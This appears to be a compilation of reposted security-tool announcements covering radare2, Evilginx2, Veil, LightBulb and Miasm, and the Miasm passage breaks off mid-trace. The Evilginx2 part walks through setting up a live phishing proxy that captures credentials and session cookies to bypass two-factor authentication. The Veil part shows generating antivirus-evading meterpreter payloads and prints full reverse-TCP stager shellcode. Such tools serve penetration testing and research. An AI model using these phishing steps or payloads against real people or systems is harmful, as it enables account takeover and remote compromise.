Radare2 – Unix-Like Reverse Engineering Framework And Commandline Tools Security

r2 is a rewrite from scratch of radare in order to provide a set of libraries and tools to work with binary files.

The radare project started as a forensics tool, a scriptable command-line hexadecimal editor able to open disk files, but later added support for analyzing binaries, disassembling code, debugging programs, attaching to remote gdb servers, and more.

radare2 is portable.

Architectures

i386, x86-64, ARM, MIPS, PowerPC, SPARC, RISC-V, SH, m68k, AVR, XAP, System Z, XCore, CR16, HPPA, ARC, Blackfin, Z80, H8/300, V810, V850, CRIS, XAP, PIC, LM32, 8051, 6502, i4004, i8080, Propeller, Tricore, Chip8, LH5801, T8200, GameBoy, SNES, MSP430, Xtensa, NIOS II, Dalvik, WebAssembly, MSIL, EBC, TMS320 (c54x, c55x, c55+, c66), Hexagon, Brainfuck, Malbolge, DCPU16.

File Formats

ELF, Mach-O, Fat Mach-O, PE, PE+, MZ, COFF, OMF, TE, XBE, BIOS/UEFI, Dyldcache, DEX, ART, CGC, Java class, Android boot image, Plan9 executable, ZIMG, MBN/SBL bootloader, ELF coredump, MDMP (Windows minidump), WASM (WebAssembly binary), Commodore VICE emulator, Game Boy (Advance), Nintendo DS ROMs and Nintendo 3DS FIRMs, various filesystems.

Operating Systems

Windows (since XP), GNU/Linux, OS X, [Net|Free|Open]BSD, Android, iOS, OSX, QNX, Solaris, Haiku, FirefoxOS.

Bindings

Vala/Genie, Python (2, 3), NodeJS, Lua, Go, Perl, Guile, PHP, Newlisp, Ruby, Java, OCaml, and more.

Dependencies

radare2 can be built without any special dependency; just get a working toolchain (gcc, clang, tcc, ...) and use make.

Optionally you can use libewf for loading EnCase disk images.

To build the bindings you need the latest valabind, g++ and swig2.

Install

The easiest way to install radare2 from git is by running the following command:

    $ sys/install.sh

If you want to install radare2 in the home directory without using root privileges and sudo, simply run:

    $ sys/user.sh

Building with meson + ninja

If you don't already have meson and ninja, you can install them with your distribution package manager or with r2pm:

    $ r2pm -i meson

If you already have them installed, you can run this line to compile radare2:

    $ python ./sys/meson.py --prefix=/usr --shared --install

This method is mostly useful on Windows because the initial building with Makefile is not suitable. If you are lost in any way, just type:

    $ python ./sys/meson.py --help

Update

To update radare2 system-wide, you don't need to uninstall or pull. Just re-run:

    $ sys/install.sh

If you installed radare2 in the home directory, just re-run:

    $ sys/user.sh

Uninstall

In case of a polluted filesystem, you can uninstall the current version or remove all previous installations:

    $ make uninstall
    $ make purge

To remove everything including libraries, use:

    $ make system-purge

Package manager

radare2 has its own package manager, r2pm. Its packages repository is on GitHub too. To start using it for the first time, you need to initialize the packages:

    $ r2pm init

Refresh the packages database before installing any package:

    $ r2pm update

To install a package, use the following command:

    $ r2pm install [package name]

Bindings

All language bindings are under the r2-bindings directory. You will need to install swig and valabind in order to build the bindings for Python, Lua, etc. APIs are defined in vapi files which are then translated to swig interfaces, nodejs-ffi or other and then compiled.

The easiest way to install the python bindings is to run:

    $ r2pm install lang-python2 # lang-python3 for python3 bindings
    $ r2pm install r2api-python
    $ r2pm install r2pipe-py

In addition there are r2pipe bindings, which are an API interface to interact with the prompt, passing commands and receiving the output as a string. Many commands support JSON output, so it integrates easily with many languages in order to deserialize it into native objects.

    $ npm install r2pipe   # NodeJS
    $ gem install r2pipe   # Ruby
    $ pip install r2pipe   # Python
    $ opam install radare2 # OCaml

And also for Go, Rust, Swift, D, .NET, Java, NewLisp, Perl, Haskell, Vala, OCaml, and many more to come!

Regression Testsuite

Running make tests will fetch the radare2-regressions repository and run all the tests in order to verify that no changes break any functionality.

We run those tests on every commit, and they are also executed with ASAN and valgrind on different platforms to catch other unwanted 'features'.

Documentation

There is no formal documentation of r2 yet. Not all commands are compatible with radare1, so the best way to learn how to do stuff in r2 is by reading the examples from the web and appending '?' to every command you are interested in.

Commands are small mnemonics of a few characters and there is some extra syntax sugar that makes the shell much more pleasant for scripting and interacting with the APIs.

You could also check out the radare2 book.

Webserver

radare2 comes with an embedded webserver which serves a pure html/js interface that sends ajax queries to the core and aims to implement a usable UI for phones, tablets and desktops.

    $ r2 -c=H /bin/ls

To use the webserver on Windows, you require a cmd instance with administrator rights. To start the webserver, use the following command in the project root:

    > radare2.exe -c=H rax2.exe

Pointers

Website: https://www.radare.org/
IRC: irc.freenode.net #radare
Telegram: https://t.me/radare
Matrix: @radare2:matrix.org
Twitter: @radareorg

Link: http://feedproxy.google.com/~r/PentestTools/~3/d_ECVYw56ug/radare2-unix-like-reverse-engineering.html

Evilginx2 v2.2.0 – Standalone Man-In-The-Middle Attack Framework Used For Phishing Login Credentials Along With Session Cookies, Allowing For The Bypass Of 2-Factor Authentication

evilginx2 is a man-in-the-middle attack framework used for phishing login credentials along with session cookies, which in turn allows bypassing 2-factor authentication protection.

This tool is a successor to Evilginx, released in 2017, which used a custom version of the nginx HTTP server to provide man-in-the-middle functionality to act as a proxy between a browser and the phished website. The present version is fully written in Go as a standalone application, which implements its own HTTP and DNS server, making it extremely easy to set up and use.

Video

See evilginx2 in action here: "Evilginx 2 – Next Generation of Phishing 2FA Tokens" from breakdev.org on Vimeo.

Write-up

If you want to learn more about this phishing technique, I've published an extensive blog post about evilginx2 here: https://breakdev.org/evilginx-2-next-generation-of-phishing-2fa-tokens

Phishlet Masters – Hall of Fame

Please thank the following contributors for devoting their precious time to deliver us fresh phishlets! (in order of first contributions)

@cust0msync – Amazon, Reddit
@white_fi – Twitter
rvrsh3ll @424f424f – Citrix

Installation

You can either use a precompiled binary package for your architecture or you can compile evilginx2 from source.

You will need an external server where you'll host your evilginx2 installation. I personally recommend Digital Ocean and if you follow my referral link, you will get an extra $10 to spend on servers for free. Evilginx runs very well on the most basic Debian 8 VPS.

Installing from source

In order to compile from source, make sure you have installed Go version 1.10.0 or later (get it from here) and that the $GOPATH environment variable is set up properly (default $HOME/go).

After installation, add this to your ~/.profile, assuming that you installed Go in /usr/local/go:

    export GOPATH=$HOME/go
    export PATH=$PATH:/usr/local/go/bin:$GOPATH/bin

Then load it with source ~/.profile.

Now you should be ready to install evilginx2. Follow these instructions:

    sudo apt-get install git make
    go get -u github.com/kgretzky/evilginx2
    cd $GOPATH/src/github.com/kgretzky/evilginx2
    make

You can now either run evilginx2 from the local directory like:

    sudo ./bin/evilginx -p ./phishlets/

or install it globally:

    sudo make install
    sudo evilginx

The instructions above can also be used to update evilginx2 to the latest version.

Installing with Docker

You can launch evilginx2 from within Docker. First build the container:

    docker build . -t evilginx2

Then you can run the container:

    docker run -it -p 53:53/udp -p 80:80 -p 443:443 evilginx2

Phishlets are loaded within the container at /app/phishlets, which can be mounted as a volume for configuration.

Installing from precompiled binary packages

Grab the package you want from here and drop it on your box. Then do:

    unzip <package_name>.zip -d <package_name>
    cd <package_name>

If you want to do a system-wide install, use the install script with root privileges:

    chmod 700 ./install.sh
    sudo ./install.sh
    sudo evilginx

or just launch evilginx2 from the current directory (you will also need root privileges):

    chmod 700 ./evilginx
    sudo ./evilginx

Usage

IMPORTANT! Make sure that there is no service listening on ports TCP 443, TCP 80 and UDP 53. You may need to shut down apache or nginx and any service used for resolving DNS that may be running. evilginx2 will tell you on launch if it fails to open a listening socket on any of these ports.

By default, evilginx2 will look for phishlets in the ./phishlets/ directory and later in /usr/share/evilginx/phishlets/. If you want to specify a custom path to load phishlets from, use the -p <phishlets_dir_path> parameter when launching the tool.

    Usage of ./evilginx:
      -debug
            Enable debug output
      -developer
            Enable developer mode (generates self-signed certificates for all hostnames)
      -p string
            Phishlets directory path

You should see the evilginx2 logo with a prompt to enter commands. Type help or help <command> if you want to see available commands or more detailed information on them.

Getting started

To get up and running, you need to first do some setting up.

At this point I assume you've already registered a domain (let's call it yourdomain.com) and you set up the nameservers (both ns1 and ns2) in your domain provider's admin panel to point to your server's IP (e.g. 10.0.0.1):

    ns1.yourdomain.com = 10.0.0.1
    ns2.yourdomain.com = 10.0.0.1

Set up your server's domain and IP using the following commands:

    config domain yourdomain.com
    config ip 10.0.0.1

Now you can set up the phishlet you want to use. For the sake of this short guide, we will use a LinkedIn phishlet. Set up the hostname for the phishlet (it must contain your domain obviously):

    phishlets hostname linkedin my.phishing.hostname.yourdomain.com

And now you can enable the phishlet, which will initiate automatic retrieval of LetsEncrypt SSL/TLS certificates if none are locally found for the hostname you picked:

    phishlets enable linkedin

Your phishing site is now live. Think of the URL you want the victim to be redirected to on successful login and get the phishing URL like this (the victim will be redirected to https://www.google.com):

    phishlets get-url linkedin https://www.google.com

Running phishlets will only respond to tokenized links, so any scanners who scan your main domain will be redirected to the URL specified as redirect_url under config. If you want to hide your phishlet and make it not respond even to valid tokenized phishing URLs, use the phishlet hide/unhide <phishlet> command.

You can monitor captured credentials and session cookies with:

    sessions

To get detailed information about the captured session, with the session cookie itself (it will be printed in JSON format at the bottom), select its session ID:

    sessions <id>

The captured session cookie can be copied and imported into the Chrome browser, using the EditThisCookie extension.

Important! If you want evilginx2 to continue running after you log out from your server, you should run it inside a screen session.

Credits

Huge thanks to Simone Margaritelli (@evilsocket) for bettercap and inspiring me to learn Go and rewrite the tool in that language!

Link: http://www.kitploit.com/2018/12/evilginx2-v220-standalone-man-in-middle.html

Veil – Tool To Generate Metasploit Payloads That Bypass Common Anti-virus Solutions

Veil is a tool designed to generate metasploit payloads that bypass common anti-virus solutions.

Veil is currently under support by @ChrisTruncer.

Software Requirements

The following OSs are officially supported:

Debian 8+
Kali Linux Rolling 2018.1+

The following OSs are likely able to run Veil:

Arch Linux
BlackArch Linux
Deepin 15+
Elementary
Fedora 22+
Linux Mint
Parrot Security
Ubuntu 15.10+

Setup

Kali's Quick Install

    apt -y install veil
    /usr/share/veil/config/setup.sh --force --silent

Git's Quick Install

NOTE: Installation must be done with superuser privileges. If you are not using the root account (as default with Kali Linux), prepend commands with sudo or change to the root user before beginning. Your package manager may be different to apt.

    sudo apt-get -y install git
    git clone https://github.com/Veil-Framework/Veil.git
    cd Veil/
    ./config/setup.sh --force --silent

./config/setup.sh // Setup Files

This file is responsible for installing all the dependencies of Veil. This includes the whole WINE environment, for the Windows side of things. It will install all the necessary Linux packages and GoLang, as well as Python, Ruby and AutoIT for Windows. In addition, it will also run ./config/update-config.py for your environment.

It includes two optional flags, --force and --silent:

--force ~ If something goes wrong, this will overwrite detecting any previous installs. Useful when there is a setup package update.
--silent ~ This will perform an unattended installation of everything, as it will automate all the steps, so there is no interaction for the user.

This can be run either by doing: ./Veil.py --setup OR ./config/setup.sh --force

./config/update-config.py // Regenerating Configuration file

This will generate the output file for /etc/veil/settings.py. Most of the time it will not need to be rebuilt but in some cases you might be prompted to do so (such as a major Veil update).

It is important that you are in the ./config/ directory before executing update-config.py. If you are not, /etc/veil/settings.py will be incorrect and when you launch Veil you will see the following:

    Main Menu

        0 payloads loaded

Don't panic. Run either: ./Veil.py --config OR cd ./config/; ./update-config.py

Py2Exe

NOTE: Using Py2Exe is recommended over PyInstaller (as it has a lower detection rate).

MANUALLY install on a Windows computer (as this isn't done by Veil's setup):

Python 3.3
Py2Exe
PyCrypto
PyWin32

Example Usage

Veil's Main Menu:

    $ ./Veil.py
    ===============================================================================
                                       Veil | [Version]: 3.1.6
    ===============================================================================
          [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
    ===============================================================================

    Main Menu

        2 tools loaded

    Available Tools:

        1)  Evasion
        2)  Ordnance

    Available Commands:

        exit        Completely exit Veil
        info        Information on a specific tool
        list        List available tools
        options     Show Veil configuration
        update      Update Veil
        use         Use a specific tool

    Veil>:

Help

    $ ./Veil.py --help
    usage: Veil.py [--list-tools] [-t TOOL] [--update] [--setup] [--config]
                   [--version] [--ip IP] [--port PORT] [--list-payloads]
                   [-p [PAYLOAD]] [-o OUTPUT-NAME]
                   [-c [OPTION=value [OPTION=value ...]]]
                   [--msfoptions [OPTION=value [OPTION=value ...]]]
                   [--msfvenom ] [--compiler pyinstaller] [--clean]
                   [--ordnance-payload PAYLOAD] [--list-encoders]
                   [-e ENCODER] [-b \x00\x0a..] [--print-stats]

    Veil is a framework containing multiple tools.

    [*] Veil Options:
      --list-tools          List Veil's tools
      -t TOOL, --tool TOOL  Specify Veil tool to use (Evasion, Ordnance etc.)
      --update              Update the Veil framework
      --setup               Run the Veil framework setup file & regenerate the
                            configuration
      --config              Regenerate the Veil framework configuration file
      --version             Displays version and quits

    [*] Callback Settings:
      --ip IP, --domain IP  IP address to connect back to
      --port PORT           Port number to connect to

    [*] Payload Settings:
      --list-payloads       Lists all available payloads for that tool

    [*] Veil-Evasion Options:
      -p [PAYLOAD]          Payload to generate
      -o OUTPUT-NAME        Output file base name for source and compiled binaries
      -c [OPTION=value [OPTION=value ...]]
                            Custom payload module options
      --msfoptions [OPTION=value [OPTION=value ...]]
                            Options for the specified metasploit payload
      --msfvenom []         Metasploit shellcode to generate (e.g.
                            windows/meterpreter/reverse_tcp etc.)
      --compiler pyinstaller
                            Compiler option for payload (currently only needed for
                            Python)
      --clean               Clean out payload folders

    [*] Veil-Ordnance Shellcode Options:
      --ordnance-payload PAYLOAD
                            Payload type (bind_tcp, rev_tcp, etc.)

    [*] Veil-Ordnance Encoder Options:
      --list-encoders       Lists all available encoders
      -e ENCODER, --encoder ENCODER
                            Name of shellcode encoder to use
      -b \x00\x0a.., --bad-chars \x00\x0a..
                            Bad characters to avoid
      --print-stats         Print information about the encoded shellcode
    $

Veil Evasion CLI

    $ ./Veil.py -t Evasion -p go/meterpreter/rev_tcp.py --ip 127.0.0.1 --port 4444
    ===============================================================================
                                       Veil-Evasion
    ===============================================================================
          [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
    ===============================================================================

    runtime/internal/sys
    runtime/internal/atomic
    runtime
    errors
    internal/race
    sync/atomic
    math
    sync
    io
    unicode/utf8
    internal/syscall/windows/sysdll
    unicode/utf16
    syscall
    strconv
    reflect
    encoding/binary
    command-line-arguments
    ===============================================================================
                                       Veil-Evasion
    ===============================================================================
          [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
    ===============================================================================

     [*] Language: go
     [*] Payload Module: go/meterpreter/rev_tcp
     [*] Executable written to: /var/lib/veil/output/compiled/payload.exe
     [*] Source code written to: /var/lib/veil/output/source/payload.go
     [*] Metasploit Resource file written to: /var/lib/veil/output/handlers/payload.rc
    $
    $ file /var/lib/veil/output/compiled/payload.exe
    /var/lib/veil/output/compiled/payload.exe: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
    $

Veil Ordnance CLI

    $ ./Veil.py -t Ordnance --ordnance-payload rev_tcp --ip 127.0.0.1 --port 4444
    ===============================================================================
                                       Veil-Ordnance
    ===============================================================================
          [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
    ===============================================================================

     [*] Payload Name: Reverse TCP Stager (Stage 1)
     [*] IP Address: 127.0.0.1
     [*] Port: 4444
     [*] Shellcode Size:
    287

    \xfc\xe8\x86\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x8b\x4c\x10\x78\xe3\x4a\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x89\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x09\x68\x7f\x00\x00\x01\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x85\xf6\x75\xec\xc3
    $

Link: http://www.kitploit.com/2018/12/veil-tool-to-generate-metasploit.html

LightBulb Framework – Tools For Auditing WAFS

LightBulb is an open source python framework for auditing web application firewalls and filters.

Synopsis

The framework consists of two main algorithms:

GOFA: An active learning algorithm that infers symbolic representations of automata in the standard membership/equivalence query model. Active learning algorithms permit the analysis of filter and sanitizer programs remotely, i.e. given only the ability to query the targeted program and observe the output.

SFADiff: A black-box differential testing algorithm based on Symbolic Finite Automata (SFA) learning. Finding differences between programs with similar functionality is an important security problem, as such differences can be used for fingerprinting or creating evasion attacks against security software like Web Application Firewalls (WAFs), which are designed to detect malicious inputs to web applications.

Motivation

Web Application Firewalls (WAFs) are fundamental building blocks of modern application security. For example, the PCI standard for organizations handling credit card transactions dictates that any application facing the internet should be either protected by a WAF or successfully pass a code review process. Nevertheless, despite their popularity and importance, auditing web application firewalls remains a challenging and complex task. Finding attacks that bypass the firewall usually requires expert domain knowledge for a specific vulnerability class. Thus, penetration testers not armed with this knowledge are left with publicly available lists of attack strings, like the XSS Cheat Sheet, which are usually insufficient for thoroughly evaluating the security of a WAF product.

Commands Usage

Main interface commands:

    Command                      Description
    core                         Shows available core modules
    utils                        Shows available query handlers
    info                         Prints module information
    library                      Enters library
    modules                      Shows available application modules
    use <module>                 Enters module
    start <moduleA> <moduleB>    Initiate algorithm
    help                         Prints help
    status                       Checks and installs required packages
    complete                     Prints bash completion command

Module commands:

    Command                      Description
    back                         Go back to main menu
    info                         Prints current module information
    library                      Enters library
    options                      Shows available options
    define <option> <value>      Set an option value
    start                        Initiate algorithm
    complete                     Prints bash completion command

Library commands:

    Command                      Description
    back                         Go back to main menu
    info <folder\module>         Prints requested module information (folder must be located in lightbulb/data/)
    cat <folder\module>          Prints requested module (folder must be located in lightbulb/data/)
    modules <folder>             Shows available library modules in the requested folder (folder must be located in lightbulb/data/)
    search <keywords>            Searches available library modules using comma separated keywords
    complete                     Prints bash completion command

Installation

Prepare your system

First you have to verify that your system supports flex, python dev, pip and build utilities:

For apt platforms (ubuntu, debian, ...):

    sudo apt-get install flex
    sudo apt-get install python-pip
    sudo apt-get install python-dev
    sudo apt-get install build-essential

(Optional for apt) If you want to add support for MySQL testing:

    sudo apt-get install libmysqlclient-dev

For yum platforms (centos, redhat, fedora, ...) with the extra packages repo (epel-release) already installed:

    sudo yum install -y python-pip
    sudo yum install -y python-devel
    sudo yum install -y wget
    sudo yum groupinstall -y 'Development Tools'

(Optional for yum) If you want to add support for MySQL testing:

    sudo yum install -y mysql-devel
    sudo yum install -y MySQL-python

Install Lightbulb

In order to use the application without complete package installation:

    git clone https://github.com/lightbulb-framework/lightbulb-framework
    cd lightbulb-framework
    make
    lightbulb status

In order to perform a complete package installation, you can also install it from the pip repository. This requires first installing the latest setuptools version:

    pip install setuptools --upgrade
    pip install lightbulb-framework
    lightbulb status

If you want to use virtualenv:

    pip install virtualenv
    virtualenv env
    source env/bin/activate
    pip install lightbulb-framework
    lightbulb status

The "lightbulb status" command will guide you to install MySQLdb and OpenFst support. If you use virtualenv in linux, the "sudo" command will be required only for the installation of the libmysqlclient-dev package.

It should be noted that the "lightbulb status" command is not necessary if you are going to use the Burp Extension. The reason is that this command installs the "openfst" and "mysql" bindings, and the extension by default uses Jython, which does not support C bindings. It is recommended to use the command only if you want to change the Burp extension configuration from the settings and enable the native support.

It is also possible to use a docker instance:

    docker pull lightbulb/lightbulb-framework

Install Burp Extension

If you wish to use the new GUI, you can use the extension for the Burp Suite. First you have to set up a working environment with Burp Proxy and Jython:

Download the latest Jython from here
Find your local python packages installation folder*
Configure Burp Extender to use these values, as shown below*
Select the new LightBulb module ("BurpExtension.py") and set the extension type to be "Python"

*You can ignore this step, and install the standalone version which contains all the required python packages included. You can download it here.

Examples

Check out the Wiki page for usage examples.

Contributors

George Argyros
Ioannis Stais
Suman Jana
Angelos D. Keromytis
Aggelos Kiayias

References

G. Argyros, I. Stais, S. Jana, A. D. Keromytis, and A. Kiayias. 2016. SFADiff: Automated Evasion Attacks and Fingerprinting Using Black-box Differential Automata Learning. In Proceedings of the 2016 ACM SIGSAC Conference on Computer and Communications Security (CCS '16). ACM, New York, NY, USA, 1690-1701. doi: 10.1145/2976749.2978383

G. Argyros, I. Stais, A. Kiayias and A. D. Keromytis, "Back in Black: Towards Formal, Black Box Analysis of Sanitizers and Filters," 2016 IEEE Symposium on Security and Privacy (SP), San Jose, CA, 2016, pp. 91-109. doi: 10.1109/SP.2016.14
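The membership/equivalence query model that the Synopsis attributes to GOFA, in runnable form. This is an added example and not LightBulb's code: a minimal Angluin-style L* learner treats a filter as a black box, asks it only "is this input allowed?" questions, and recovers a DFA describing exactly which inputs get through, while counting the queries that cost. The three-symbol alphabet, the `toy_filter` stand-in for the remote filter, and the bounded-length equivalence oracle are constructed for this example; LightBulb's GOFA learns symbolic automata over large alphabets and uses smarter equivalence checks, but the mechanism is the same.

```python
"""Added example (not LightBulb's own code): Angluin-style L* learning of a
black-box filter from membership and equivalence queries alone."""
from itertools import product

ALPHABET = ("a", "<", "s")  # constructed toy alphabet (GOFA uses symbolic ones)

def toy_filter(word):
    """Constructed stand-in for a remote filter: True = allowed through.
    The rule (block anything containing "<s") is what the learner must
    recover without ever reading this function."""
    return "<s" not in word

class DFA:
    """Hypothesis automaton; its states are rows of the observation table."""
    def __init__(self, start, accepting, delta):
        self.start, self.accepting, self.delta = start, accepting, delta

    def accepts(self, word):
        state = self.start
        for ch in word:
            state = self.delta[(state, ch)]
        return state in self.accepting

class LStar:
    def __init__(self, alphabet, membership):
        self.alphabet, self.membership = alphabet, membership
        self.cache, self.queries = {}, 0  # queries = audit cost in filter requests
        self.S, self.E = [""], [""]       # access prefixes / distinguishing suffixes

    def query(self, word):
        # Membership query, cached so the filter is asked once per word.
        if word not in self.cache:
            self.cache[word] = bool(self.membership(word))
            self.queries += 1
        return self.cache[word]

    def row(self, prefix):
        return tuple(self.query(prefix + e) for e in self.E)

    def _unclosed(self):
        """Some s.a whose row no prefix in S has yet (table not closed)."""
        rows = {self.row(s) for s in self.S}
        for s in self.S:
            for a in self.alphabet:
                if self.row(s + a) not in rows:
                    return s + a
        return None

    def _inconsistent(self):
        """A suffix a.e that separates two rows which currently look identical."""
        for i, s1 in enumerate(self.S):
            for s2 in self.S[i + 1:]:
                if self.row(s1) != self.row(s2):
                    continue
                for a in self.alphabet:
                    for e in self.E:
                        if self.query(s1 + a + e) != self.query(s2 + a + e):
                            return a + e
        return None

    def hypothesis(self):
        rep = {}
        for s in self.S:
            rep.setdefault(self.row(s), s)  # one representative prefix per row
        delta = {(r, a): self.row(s + a) for r, s in rep.items() for a in self.alphabet}
        accepting = {r for r in rep if r[0]}  # E[0] == "", so r[0] is the prefix itself
        return DFA(self.row(""), accepting, delta)

    def learn(self, equivalence):
        while True:
            prefix = self._unclosed()
            if prefix is not None:
                self.S.append(prefix)
                continue
            suffix = self._inconsistent()
            if suffix is not None:
                self.E.append(suffix)
                continue
            hyp = self.hypothesis()
            cex = equivalence(hyp)
            if cex is None:
                return hyp
            for i in range(1, len(cex) + 1):  # add every prefix of the counterexample
                if cex[:i] not in self.S:
                    self.S.append(cex[:i])

def bounded_equivalence(target, alphabet, max_len):
    """Approximate equivalence oracle: first word of length <= max_len on which
    hypothesis and filter disagree, or None. A real audit has to sample or
    search here, because the filter only ever answers single membership queries."""
    def oracle(hyp):
        for n in range(max_len + 1):
            for chars in product(alphabet, repeat=n):
                word = "".join(chars)
                if hyp.accepts(word) != bool(target(word)):
                    return word
        return None
    return oracle

def learn_filter_model(target=toy_filter, alphabet=ALPHABET, max_len=6):
    """Learn a DFA for `target`; returns (dfa, number of membership queries)."""
    learner = LStar(alphabet, target)
    dfa = learner.learn(bounded_equivalence(target, alphabet, max_len))
    return dfa, learner.queries
```

`learn_filter_model()` returns a three-state automaton for the toy rule (no "<" seen, a pending "<", and a rejecting sink) together with the number of membership queries the learner spent, which is the figure an auditor watches since every query is one request against the filter under test. Replacing `toy_filter` with a function that submits the word to a real filter and reports allow/block is the only change needed to model a deployed rule set, and the learned DFA then documents precisely which inputs that rule set lets through.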

Link: http://www.kitploit.com/2018/12/lightbulb-framework-tools-for-auditing.html

Miasm – Reverse Engineering Framework In Python

Miasm is a free and open source (GPLv2) reverse engineering framework. Miasm aims to analyze / modify / generate binary programs. Here is a non exhaustive list of features:Opening / modifying / generating PE / ELF 32 / 64 LE / BE using ElfesteemAssembling / Disassembling X86 / ARM / MIPS / SH4 / MSP430Representing assembly semantic using intermediate languageEmulating using JIT (dynamic code analysis, unpacking, …)Expression simplification for automatic de-obfuscation…See the official blog for more examples and demos.Basic examplesAssembling / DisassemblingImport Miasm x86 architecture:>>> from miasm2.arch.x86.arch import mn_x86>>> from miasm2.core.locationdb import LocationDBGet a location db:>>> loc_db = LocationDB()Assemble a line:>>> l = mn_x86.fromstring(‘XOR ECX, ECX’, loc_db, 32)>>> print lXOR ECX, ECX>>> mn_x86.asm(l)[‘1\xc9’, ‘3\xc9’, ‘g1\xc9’, ‘g3\xc9’]Modify an operand:>>> l.args[0] = mn_x86.regs.EAX>>> print lXOR EAX, ECX>>> a = mn_x86.asm(l)>>> print a[‘1\xc8’, ‘3\xc1’, ‘g1\xc8’, ‘g3\xc1’]Disassemble the result:>>> print mn_x86.dis(a[0], 32)XOR EAX, ECXUsing Machine abstraction:>>> from miasm2.analysis.machine import Machine>>> mn = Machine(‘x86_32’).mn>>> print mn.dis(‘\x33\x30’, 32)XOR ESI, DWORD PTR [EAX]For Mips:>>> mn = Machine(‘mips32b’).mn>>> print mn.dis(’97A30020′.decode(‘hex’), “b")LHU V1, 0x20(SP)Intermediate representationCreate an instruction:>>> machine = Machine(‘arml’)>>> instr = machine.mn.dis(‘002088e0’.decode(‘hex’), ‘l’)>>> print instrADD R2, R8, R0Create an intermediate representation object:>>> ira = machine.ira(loc_db)Create an empty ircfg>>> ircfg = ira.new_ircfg()Add instruction to the pool:>>> ira.add_instr_to_ircfg(instr, ircfg)Print current pool:>>> for lbl, irblock in ircfg.blocks.items():… print irblock.to_string(loc_db)loc_0:R2 = R8 + R0IRDst = loc_4Working with IR, for instance by getting side effects:>>> for lbl, irblock in ircfg.blocks.iteritems():… for assignblk in irblock:… rw = assignblk.get_rw()… for dst, reads in 
... rw.iteritems():
...     print 'read:   ', [str(x) for x in reads]
...     print 'written:', dst
...     print
...
read:    ['R8', 'R0']
written: R2

read:    []
written: IRDst

Emulation

Given a shellcode:

00000000 8d4904  lea ecx, [ecx+0x4]
00000003 8d5b01  lea ebx, [ebx+0x1]
00000006 80f901  cmp cl, 0x1
00000009 7405    jz 0x10
0000000b 8d5bff  lea ebx, [ebx-1]
0000000e eb03    jmp 0x13
00000010 8d5b01  lea ebx, [ebx+0x1]
00000013 89d8    mov eax, ebx
00000015 c3      ret

>>> s = '\x8dI\x04\x8d[\x01\x80\xf9\x01t\x05\x8d[\xff\xeb\x03\x8d[\x01\x89\xd8\xc3'

Import the shellcode thanks to the Container abstraction:

>>> from miasm2.analysis.binary import Container
>>> c = Container.from_string(s)
>>> c

Disassembling the shellcode at address 0:

>>> from miasm2.analysis.machine import Machine
>>> machine = Machine('x86_32')
>>> mdis = machine.dis_engine(c.bin_stream)
>>> asmcfg = mdis.dis_multiblock(0)
>>> for block in asmcfg.blocks:
...     print block.to_string(asmcfg.loc_db)
...
loc_0
LEA        ECX, DWORD PTR [ECX + 0x4]
LEA        EBX, DWORD PTR [EBX + 0x1]
CMP        CL, 0x1
JZ         loc_10
->  c_next:loc_b   c_to:loc_10
loc_10
LEA        EBX, DWORD PTR [EBX + 0x1]
->  c_next:loc_13
loc_b
LEA        EBX, DWORD PTR [EBX + 0xFFFFFFFF]
JMP        loc_13
->  c_to:loc_13
loc_13
MOV        EAX, EBX
RET

Initializing the Jit engine with a stack:

>>> jitter = machine.jitter(jit_type='python')
>>> jitter.init_stack()

Add the shellcode in an arbitrary memory location:

>>> run_addr = 0x40000000
>>> from miasm2.jitter.csts import PAGE_READ, PAGE_WRITE
>>> jitter.vm.add_memory_page(run_addr, PAGE_READ | PAGE_WRITE, s)

Create a sentinel to catch the return of the shellcode:

def code_sentinelle(jitter):
    jitter.run = False
    jitter.pc = 0
    return True

>>> jitter.add_breakpoint(0x1337beef, code_sentinelle)
>>> jitter.push_uint32_t(0x1337beef)

Activate logs:

>>> jitter.set_trace_log()

Run at an arbitrary address:

>>> jitter.init_run(run_addr)
>>> jitter.continue_run()
RAX 0000000000000000 RBX 0000000000000000 RCX 0000000000000000 RDX 0000000000000000
RSI 0000000000000000 RDI 0000000000000000 RSP 000000000123FFF8 RBP 0000000000000000
zf 0000000000000000 nf 0000000000000000 of 0000000000000000 cf 0000000000000000
RIP 0000000040000000
40000000 LEA        ECX, DWORD PTR [ECX+0x4]
RAX 0000000000000000 RBX 0000000000000000 RCX 0000000000000004 RDX 0000000000000000
RSI 0000000000000000 RDI 0000000000000000 RSP 000000000123FFF8 RBP 0000000000000000
